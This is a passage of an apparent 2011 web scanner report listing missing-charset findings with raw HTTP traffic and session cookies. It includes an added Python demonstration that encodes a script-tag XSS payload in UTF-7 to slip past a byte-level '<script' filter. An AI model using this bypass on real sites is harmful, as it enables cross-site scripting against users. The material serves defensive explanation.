Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LOCALE=en%5FUS; CURRENCY=USD; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.3.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; LANGUAGE=1

cid=82686&locale=en_US&creditCardLastName=&numberOfAdults=2&numberOfChildren=0&numberOfRooms=1&departureDay=7&departureMonth=9&departureYear=2011&arrivalDay=4&arrivalMonth=9&arrivalYear=2011&rateFrequ
...[SNIP]...

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:30:37 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LOCALE=en%5FUS;path=/
Set-Cookie: CURRENCY=USD;path=/
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 58824

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Book Now - Submit Secure Hotel Reservation</title>
       <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...

26.7. https://www.hotelplanner.com/LastActive.cfm

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.hotelplanner.com
Path:   /LastActive.cfm

Request

GET /LastActive.cfm HTTP/1.1
Host: www.hotelplanner.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: https://www.hotelplanner.com/Accept/Reserve.cfm?sslsite=HOTELPLANNER.COM&locale=en_US&currency=USD
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.3.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; LOCALE=en%5FUS; CURRENCY=USD; LANGUAGE=1

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:29:16 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 0


26.8. https://www.hotelplanner.com/TT.cfm

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.hotelplanner.com
Path:   /TT.cfm

Request

GET /TT.cfm?Type=3&PageURL=https%3A%2F%2Fwww%2Ehotelplanner%2Ecom%2FAccept%2FReserve%2Ecfm%3Fsslsite%3DHOTELPLANNER%2ECOM%26locale%3Den%5FUS%26currency%3DUSD&Notes=&recache=C7359DF8-1372-5005-24DAD771D6D35804 HTTP/1.1
Host: www.hotelplanner.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: https://www.hotelplanner.com/Accept/Reserve.cfm?sslsite=HOTELPLANNER.COM&locale=en_US&currency=USD
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; SCREENWIDTH=1920; SCREENHEIGHT=1200; SOURCECODE=Away; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.4.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; TRAFFICID=15786488; LOCALE=en%5FUS; CURRENCY=USD; LANGUAGE=1

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:44:23 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 0


27. HTML does not specify charset
There are 83 instances of this issue:

Issue description

If a web response states that it contains HTML content but does not specify a character set, the browser may analyse the HTML and guess which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of unusual byte sequences anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results and, historically, led to cross-site scripting vulnerabilities in which a non-standard encoding such as UTF-7 was used to bypass the application's defensive filters: the filter sees no "<script" in the bytes, while a browser sniffing UTF-7 decodes them to exactly that. Modern browsers no longer auto-detect UTF-7, but an undeclared charset still leaves the browser to guess between the remaining encodings, so the charset should always be stated explicitly.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-Type header a directive specifying a standard recognised character set, for example charset=UTF-8 (or charset=ISO-8859-1 if that is what the content is actually written in). The declared charset must match the encoding the bytes really use; declaring the wrong one simply moves the problem rather than fixing it.
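The following is an added example, not code from the scan report or the scanner. It mirrors the "HTML does not specify charset" decision (charset in the Content-Type header, else in a meta tag within the first 1024 bytes, else missing) and then shows the bypass the description refers to: a strict UTF-7 encoder that shifts every character outside RFC 2152 Set D, so that a byte-level "<script" filter passes the payload while a UTF-7 decoder turns it back into the original tag. The encoder is written out here rather than taken from a library because the RFC lets an encoder leave < and > unshifted, and then there is nothing to demonstrate. Sample content types and bodies are constructed from instances quoted in this report; the function names are this example's own.

```python
# Added example, not part of the scan report: reproduces the missing-charset
# check and the historic UTF-7 filter bypass. Samples are constructed from
# instances quoted in the report.
import base64
import re
import string

# charset in the Content-Type header, e.g. "text/html;charset=utf-8"
CT_CHARSET = re.compile(r';\s*charset\s*=\s*"?([\w.:-]+)', re.I)
# <meta charset="..."> or the http-equiv form; browsers only prescan the
# first 1024 bytes for these, so the check does the same.
META_CHARSET = re.compile(rb"<meta[^>]+charset\s*=\s*[\"']?\s*([\w.:-]+)", re.I)


def is_html(content_type):
    media = (content_type or "").split(";")[0].strip().lower()
    return media in ("text/html", "application/xhtml+xml")


def declared_charset(content_type, body):
    """Return (source, charset): source is 'header', 'meta' or None."""
    m = CT_CHARSET.search(content_type or "")
    if m:
        return "header", m.group(1).lower()
    m = META_CHARSET.search(body[:1024])
    if m:
        return "meta", m.group(1).decode("ascii", "replace").lower()
    return None, None


def report(content_type, body):
    """'charset-missing' is what the scanner reports for the instances below."""
    if not is_html(content_type):
        return "not-html"
    source, _ = declared_charset(content_type, body)
    return "charset-declared" if source else "charset-missing"


# RFC 2152 Set D plus space: the only characters this encoder leaves as-is.
SET_D = set(string.ascii_letters + string.digits + "'(),-./:? ")


def utf7_strict(text):
    """UTF-7 with every non-Set-D character base64-shifted as +...-.

    RFC 2152 allows '<' and '>' (Set O) to be emitted directly, in which
    case the output is just HTML; this encoder always shifts them, which
    is what produces the +ADw-script+AD4- form.
    """
    out, run = [], []

    def flush():
        if run:
            raw = "".join(run).encode("utf-16-be")
            out.append("+" + base64.b64encode(raw).decode("ascii").rstrip("=") + "-")
            run.clear()

    for ch in text:
        if ch in SET_D:
            flush()
            out.append(ch)
        else:
            run.append(ch)
    flush()
    return "".join(out).encode("ascii")


def naive_script_filter(body):
    """A byte-level blacklist of the kind UTF-7 evades; True means 'clean'."""
    return b"<script" not in body.lower()


# Constructed after instance 27.3: text/html, no charset in header or body.
DCLK_CT = "text/html"
DCLK_BODY = b"<html><head><title>Advertisement</title></head><body bgcolor=#ffffff></body></html>"
# Constructed after instance 26.6: charset declared in the header.
HP_CT = "text/html; charset=UTF-8"
HP_BODY = b'<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"><html><head><title>Book Now</title>'
# Constructed: charset only in a <meta http-equiv> tag, which still counts.
META_ONLY_BODY = b'<html><head><meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"></head>'

PAYLOAD = "<script>alert(1)</script>"

if __name__ == "__main__":
    print(report(DCLK_CT, DCLK_BODY), report(HP_CT, HP_BODY))
    encoded = utf7_strict(PAYLOAD)
    print(encoded, naive_script_filter(encoded), encoded.decode("utf-7") == PAYLOAD)
```

The decode at the end uses the standard library's UTF-7 decoder to confirm the shifted bytes are the same tag a sniffing browser of the era would have seen; the fix is the Content-Type charset, not a better blacklist.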


27.1. http://ad.doubleclick.net/adi/N5282.161249.ADNETIK.COM/B5256632.283

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5282.161249.ADNETIK.COM/B5256632.283

Request

GET /adi/N5282.161249.ADNETIK.COM/B5256632.283;sz=300x250;pc=[TPAS_ID];click0=http://o-va3.wtp101.com/click?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPgBADpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M%3D&redir=;ord=1576327943? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://fw.adsafeprotected.com/rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283;sz=300x250;pc=[TPAS_ID];click0=http://o-va3.wtp101.com/click?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPgBADpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M%3D&redir=;ord=1576327943?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 39912
Date: Mon, 03 Oct 2011 00:03:24 GMT

<SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayM
...[SNIP]...

27.2. http://ad.doubleclick.net/adi/N6010.456584.XAXIS.COM/B5752701.15

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6010.456584.XAXIS.COM/B5752701.15

Request

GET /adi/N6010.456584.XAXIS.COM/B5752701.15;sz=728x90;click=http://ib.adnxs.com/click?znuEnuzW1T-HFtnO91PTPwAAAGBmZvY_aFoouqpj1D-qm4u_7QnXPxv3XqCB24t0cEeI8W8QIlnC-IhOAAAAAE1ECABlAQAAbAEAAAIAAACyGQkAPWQAAAAAAABVU0QAVVNEANgCWgD8AdsEbBEDAQUCAQQAAAAAHyfnFwAAAAA./cnd=!sAQDJgiylwcQsrMkGL3IASAA/referrer=http%3A%2F%2Fwww.goal.com/clickenc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLuQ0CQQwF0L9cGmnbILXktedyQAsU4TkkQiogpa5tglYIES9_KxYA18hqI1elPlul2FjIRBt55OzszqIl4HB_f_cVx__w5KOrCHGPk2bNTDMNo20zLlWs9JwCTkC5BZyxfF4BF-D5wA90U0FEcwAAAA%3D%3D%26dst%3D;ord=1317599426? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ib.adnxs.com/if?enc=znuEnuzW1T-HFtnO91PTPwAAAGBmZvY_aFoouqpj1D-qm4u_7QnXPxv3XqCB24t0cEeI8W8QIlnC-IhOAAAAAE1ECABlAQAAbAEAAAIAAACyGQkAPWQAAAAAAABVU0QAVVNEANgCWgD8AdsEbBEBAgUCAQQAAAAAHifUFwAAAAA.&pubclick=http://bid.openx.net/click?cd%3DH4sIAAAAAAAAABXLuQ0CQQwF0L9cGmnbILXktedyQAsU4TkkQiogpa5tglYIES9_KxYA18hqI1elPlul2FjIRBt55OzszqIl4HB_f_cVx__w5KOrCHGPk2bNTDMNo20zLlWs9JwCTkC5BZyxfF4BF-D5wA90U0FEcwAAAA%3D%3D%26dst%3D&tt_code=goal.com&udj=uf%28%27a%27%2C+1008%2C+1317599426%29%3Buf%28%27c%27%2C+117682%2C+1317599426%29%3Buf%28%27g%27%2C+51717%2C+1317599426%29%3Buf%28%27r%27%2C+596402%2C+1317599426%29%3Bppv%2815221%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815223%2C+%278398047279950264091%27%2C+1317599426%2C+1317685826%2C+117682%2C+25661%2C+0%29%3Bppv%2815225%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815227%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815229%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815231%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3B&cnd=!xCOKHwiylwcQsrMkGAAgvcgBMAA4_ANAAEjsAlAAWABgeGgAcAB4AIABAIgBAJABAZgBAaABAagBA7ABALkBxSCwcmiRzT_BAVgGUQHvCdc_yQGamZmZmZnxP9kBf_s6cM6I5D_gAdQv&ccd=!sAQDJgiylwcQsrMkGL3IASAA&referrer=http://www.goal.com&media_subtypes=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7472
Set-Cookie: id=ca5b4d83c000017||t=1317599554|et=730|cs=002213fd4884e3bed7d9e725fe; path=/; domain=.doubleclick.net; expires=Tue, 01 Oct 2013 23:52:34 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sat, 01 Oct 2011 23:52:34 GMT
Date: Sun, 02 Oct 2011 23:52:34 GMT
Expires: Sun, 02 Oct 2011 23:52:34 GMT
Cache-Control: private

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...

27.3. http://ad.doubleclick.net/adi/N6054.Invitemedia.com/B5912738.28

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6054.Invitemedia.com/B5912738.28

Request

GET /adi/N6054.Invitemedia.com/B5912738.28;sz=300x250;pc=[TPAS_ID];click=http://g.ca.bid.invitemedia.com/pixel?returnType=redirect&key=Click&message=eJwdjEsOgzAMBa.CvCYS8Qe_cJvQpCvUXVdV747NyjPS8_xIhI6lQWtbFxIOgZsywmoIYb7Awl5aNxQ9ey_gsZWJOcYb2qcb5WuO3XjztOxk0OLK_tQ08PO9rsA9sJqK._8GBj4bwg--&redirectURL=;ord=8ec82327-9a58-4baa-82d0-e8eddf84ae75? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.goal.com/en/news/9/england/2011/10/01/2691360/anderson-confident-manchester-united-will-keep-unbeaten-run
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7661
Set-Cookie: id=c28c1d83c000039||t=1317600006|et=730|cs=002213fd48e65c670a029fff3e; path=/; domain=.doubleclick.net; expires=Wed, 02 Oct 2013 00:00:06 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sun, 02 Oct 2011 00:00:06 GMT
Date: Mon, 03 Oct 2011 00:00:06 GMT
Expires: Mon, 03 Oct 2011 00:00:06 GMT
Cache-Control: private

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...

27.4. http://ad.doubleclick.net/adi/N6054.Invitemedia.com/B5912738.30

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6054.Invitemedia.com/B5912738.30

Request

GET /adi/N6054.Invitemedia.com/B5912738.30;sz=728x90;pc=[TPAS_ID];click=http://g.ca.bid.invitemedia.com/pixel?returnType=redirect&key=Click&message=eJwVjDEOhDAMBL.CXBMpWduxw2_IARW6jgrd38.udkba3ZeYaVuGSxvrQowQNxWktRBCvQA4l30cUqTrUXY7ZznlqlOrf2wy5TTLpqiWlj95oZHc4YES.H3uO7AHNhU2_P7igxtH&redirectURL=;ord=20f22283-a9d4-465d-a7eb-e4f0b508c7b3? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://d.tradex.openx.com/afr.php?zoneid=6393&cb=INSERT_RANDOM_NUMBER_HERE
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7636
Date: Sun, 02 Oct 2011 23:59:52 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...

27.5. http://ad.doubleclick.net/adi/N6333.1207.TRAVELOCITY.COM/B5568861.2

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6333.1207.TRAVELOCITY.COM/B5568861.2

Request

GET /adi/N6333.1207.TRAVELOCITY.COM/B5568861.2;sz=160x600;click=http://dm.travelocity.com/event.ng/Type%3dclick%26FlightID%3d127075%26AdID%3d169968%26TargetID%3d32592%26Segments%3d1,9,889,3090,3199,4300,4303,5796,5909,9520,10495,10506,11148,12670,13933,16594,17659,20052,20299,20311,20993,21150,21265,21649,21682,22041,22251,22308,22422,22551,22552,22607,22609,22612,22652,22783,22972,22974,23041,23043,23055,23123,23137,23138,23153,23212%26Targets%3d8858,11482,8427,8852,28340,30402,30431,31767,31928,32592,33460,33543,34010,8830,34059,34011,34009,33719,34787,33164,34632%26Values%3d25,60,80,92,101,150,152,194,208,215,232,261,264,2176,2218,2285,2305,2306,2307,2308,2310,2340,2342,2343,2359,2432,2468,2537,4760,4772,6472,6474,6510,6974,8829,9080,9119,9844,9845,9846,11161,12194,12196,12728,12736,12804%26Redirect%3d;ord=badigyw,bhirWrczqllc? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=1&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=771877&tile=128609801075344&section=results
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 1266
Date: Mon, 03 Oct 2011 00:14:33 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/
...[SNIP]...

27.6. http://ad.doubleclick.net/adi/gna.en/level2

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/gna.en/level2

Request

GET /adi/gna.en/level2;tile=5;sz=160x600;ord=940345?area=2l&pos=2&league=epl&ord=940345 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.goal.com/en/news/9/england/2011/10/01/2691360/anderson-confident-manchester-united-will-keep-unbeaten-run
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 562
Date: Mon, 03 Oct 2011 00:00:10 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><script type="text/javascript"><!--
   e9 = new Object();
e9
...[SNIP]...

27.7. http://ad.yieldmanager.com/iframe3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Request

GET /iframe3?sIBdAD10IABKKqQAAAAAAD9DKAAAAAAAAAD8AQYAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABWlIC2a93RChYjAkZYQYlvVHyaUTyyLANlDidrAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6511%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D728x90%26_salt%3D31903434%26r%3D0%26s%3D2126909,659e43ce-ed51-11e0-8f45-78e7d1f5b944,1317599467411 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=728x90&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:53:59 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0389.rm.sp2
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Sun, 02 Oct 2011 23:53:59 GMT
Pragma: no-cache
Content-Length: 105
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body><!-- Delivery record decoding failed with reason = 4 (Query string expired) --></body></html>

27.8. http://ads.pointroll.com/PortalServe/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Request

GET /PortalServe/?pid=1399334Q81720110831160016&flash=10&time=0|18:49|-5&redir=http://cdslog.contextweb.com/CDSLogger/L.aspx?q=C~538936~3448~59764~134043~106934~3~345~25~premierleague.com~2~8~1~0~2~1~-HAZoarNoKZDius-txPklIg7Z5oU_7wk6upA9MEPZ1w^~19~2~5ZvoQhA3FQCr~PpAVCxNh2PJr~1~1~1~~http%3A%2F%2Fbh.contextweb.com%2Fbh%2Fset.aspx%3Faction%3Dadd%26advid%3D3448%26token%3DTTCL1%26rurl%3D$CTURL$&data=345&r=0.26698742574080825 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Headlines/0,,12306~2469333,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
